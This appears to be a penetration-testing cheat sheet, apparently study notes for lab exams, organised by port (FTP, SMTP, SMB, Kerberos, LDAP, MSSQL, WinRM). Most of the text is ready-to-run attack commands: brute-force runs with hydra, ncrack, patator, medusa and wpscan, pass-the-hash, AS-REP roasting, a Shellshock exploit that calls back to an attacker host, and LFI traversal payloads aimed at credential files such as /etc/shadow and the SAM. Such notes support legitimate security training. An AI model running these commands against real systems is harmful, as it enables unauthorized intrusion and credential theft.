Ports and Explanations

These are the most common ports found in scans…
The following lists number, use, and effective enumeration tools…

PORTS QUICK REFERENCE (DESKTOP BROWSER)

-----------------------------------------------------------------------------
            - FIND AVAILABLE NETWORK CONNECTIONS
                nmap -sn -oG results.txt 10.X.X.0/24
-----------------------------------------------------------------------------
21          - FTP
            Try anonymous logins
-----------------------------------------------------------------------------
25          - SMTP (EMAIL)
                telnet 10.11.1.72 25
                VRFY user
                FINISH SESSION:  Ctl + ] / close
                VULN - SHELLSHOCK - need valid email address
                python2 postfix-shellshock-nc.py <ip> <email> LHOST LPORT
110         - POP
143         - IMAP
587         - SECURE EMAIL
                nc -nv 10.11.1.72 25
                nc -nvC 10.11.1.72 110
                USER enter-user
                PASS enter-pass
-----------------------------------------------------------------------------
80 / 443    - WEB
                dirb / dirbuster / gobuster / nikto / curl
                RFI / LFI / SQLI
-----------------------------------------------------------------------------
88 / 464    - KERBEROS
                pth-winexe -U WORKGROUP/User%Pass //10.11.1.220 cmd.exe
-----------------------------------------------------------------------------
111         - NFS mounts (showmount -a / -e)
-----------------------------------------------------------------------------
135         - RPC: Remote Procedure Call
                impacket-rpcdump
-----------------------------------------------------------------------------
139 / 445   - SMB (smbmap -H / smbclient -L / nmblookup -A / nbtscan)
                nmap --script nbstat.nse <ip>
                nmap --script smb-os-discovery  <ip>
                nmap --script smb-enum-shares -p139,445 <ip>
                nmap --script smb-vuln* <ip>
                'net' command on kali
                crackmapexec smb -u -p
                rpcclient -U '' -N
                impacket-lookupsid
                enum4linux
                ---------------------------------------------------------------
                CIFS (OLD WIND NT 4.0)
                SMB 1.0 / SMB1 - WIN2K / WINXP / WIN SRV 2003 WIN SRV 2003 R2
                SMB 2.0 / SMB2 - WIN VISTA / WIN SRV 2008
                SMB 2.1 / SMB2.1 - WIN 7 / WIN SRV 2008 R2
                SMB 3.0 / SMB3 - WIN 8 / WIN SRV 2012
                SMB 3.02 / SMB3 - WIN 8.1 / WIN SRV 2012 R2
                SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION) - WIN SRV 2016 / WIN 10
-----------------------------------------------------------------------------
1433        - MSSQL
                nmap --script ms-sql* -p1433
                sqsh -S 10.11.1.31 -U sa
-----------------------------------------------------------------------------
389 / 3268  - LDAP (INDICATOR OF DC)
                nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse 
                nmap -p 389 --script ldap-search <ip>
                dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.11.1.220 
                impacket-GetNPUsers thinc/10.11.1.220 -dc-ip 10.11.1.220 -request
-----------------------------------------------------------------------------   
3389        - RDP
            rdesktop -u <user> -p <pass> <host>
-----------------------------------------------------------------------------
5985 / 5986 - WINRM
            evil-winrm -u <user> -p <pass> -i <host>
-----------------------------------------------------------------------------

NMAP QUICK SEARCH

nmap -sn -oG results.txt 10.X.X.0/24

FTP
PORT 21

…simply use “anonymous” with no password to start, then enumerate

ftp ip
user: anonymous
pass: <just hit enter>

hydra -L users.txt -P passwords.txt ftp://10.10.1.299

ncrack -U users.txt -P passwords.txt ftp://10.10.1.299 

patator ftp_login host=10.10.1.299 user=FILE0 password=FILE1 0=users.txt 1=passwords.txt

EMAIL
PORT 25 - SMTP

telnet ip 25
VRFY user
Ctl + ]  # THIS IS TO CLOSE YOUR SESSION

…possible attack vector is SHELLSHOCK

python2 postfix-shellshock-nc.py LHOST LPORT

# MAY REQUIRE A VALID EMAIL ADDRESS
python2 postfix-shellshock-nc.py 10.10.1.229 [email protected] 192.168.119.229 443

PORT 110 - POP
PORT 143 - IMAP
PORT 587 - SECURE EMAIL

nc -nv 10.11.1.72 25
nc -nvC 10.11.1.72 110
USER enter-user
PASS enter-pass

WEB
PORT 80
PORT 443

…web server ports
…multiple attack vectors

dirb http://10.10.1.299

dirb http://10.10.1.299 -P 10.10.1.299:8080 -o file.txt  # USED TO SCAN OTHER PORTS

dirbuster. # GUI USED TO ENUMERATE

gobuster dir -u http://10.10.1.299:8080 -w /usr/share/wordlists/dirb/big.txt

medusa -h 10.10.1.299 -u admin -P rockyou.txt -M http -m DIR:/admin

REMOTE FILE INCLUSION

LOCAL FILE INCLUSION

SQL INJECTION

# WordPress Enumeration if found
wpscan --url http://10.10.1.299 --passwords /usr/share/wordlists/rockyou.txt --usernames admin
[!] Valid Combinations Found:
 | Username: admin, Password: password

…for LFI, you can look for very common files on a system

https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini

WINDOWS
C:\windows\win.ini 
C:\windows\system.ini
C:\windows\iis.log
C:\windows\System32\Drivers\etc\hosts
C:\Windows\system32\config\SYSTEM
C:\windows\debug\netsetup.log
C:\windows\debug\sammui.log
C:\windows\debug\netlogon.log
C:\windows\debug\passwd.log
C:\windows\system32\winevt\logs\system.evtx
C:\windows\system32\winevt\logs\Windows Powershell.evtx
C:\windows\WindowsUpdate.log
C:\windows\system32\calc.exe
C:\windows\system32\windowspowershell\v1.0\powershell.exe
C:\windows\ccm\logs\filesystemfile.log
C:\users\administrator\appdata\local\recently-used.xbel
C:\users\administrator\desktop\desktop.ini
C:\windows\panther\unattended.xml
C:\windows\panther\unattended\unattended.xml
C:\windows\repair\sam
C:\windows\system32\tasks\daily
C:\windows\panther\sysprep.inf

LINUX
/etc/passwd
/etc/shadow
/etc/crontab

KERBEROS - WINDOWS ENVIRONMENTS
PORT 88
PORT 464

…pass the hash is a common vector
…credentials must be known

pth-winexe -U WORKGROUP/User%Pass //10.10.1.299 cmd.exe

NETWORK FILE SYSTEM (NFS)
PORT 111

…you’re looking for shared drives

showmount -a
showmount -e

REMOTE PROCEDURE CALL (RPC)
PORT 135

…can reveal information about a system
…usually shows installed programs / modules

impacket-rpcdump ip

SAMBA (SMB)
PORT 139
PORT 445

…multiple enumeration techniques are available
…different versions will require different attack vectors

nmap --script nbstat.nse 
nmap --script smb-os-discovery  
nmap --script smb-enum-shares -p139,445 
nmap --script smb-vuln* 
'net' command on kali
crackmapexec smb -u -p
rpcclient -U '' -N
impacket-lookupsid
enum4linux

…it’s important to note Samba versions

CIFS (OLD WIND NT 4.0)
SMB 1.0 / SMB1 - WIN2K / WINXP / WIN SRV 2003 WIN SRV 2003 R2
SMB 2.0 / SMB2 - WIN VISTA / WIN SRV 2008
SMB 2.1 / SMB2.1 - WIN 7 / WIN SRV 2008 R2
SMB 3.0 / SMB3 - WIN 8 / WIN SRV 2012
SMB 3.02 / SMB3 - WIN 8.1 / WIN SRV 2012 R2
SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION) - WIN SRV 2016 / WIN 10

MICROSOFT SQL (MSSQL)
PORT 1433

…try to scan and connect
…the ‘sa’ account is usually an admin account

nmap --script ms-sql* -p1433
sqsh -S 10.10.1.299 -U sa

LIGHTWEIGHT DIRECTORY ACCESS PROTOCOL (LDAP)
PORT 389
PORT 3268

…very useful to Active Directory environment enumeration

nmap -sT -Pn -n --open  -p389 --script ldap-rootdse 
nmap -p 389 --script ldap-search 
dig srv _ldap._tcp.dc._msdcs. @10.10.1.299 
impacket-GetNPUsers domain/10.10.1.299 -dc-ip 10.10.1.299 -request

REMOTE DESKTOP PROTOCOL (RDP)
PORT 3389

…connection requires credentials

rdesktop -u -p

WINDOWS REMOTE MANAGEMENT (WINRM)
PORT 5985
PORT 5986

…connection requires credentials

evil-winrm -u -p -i
Scroll to top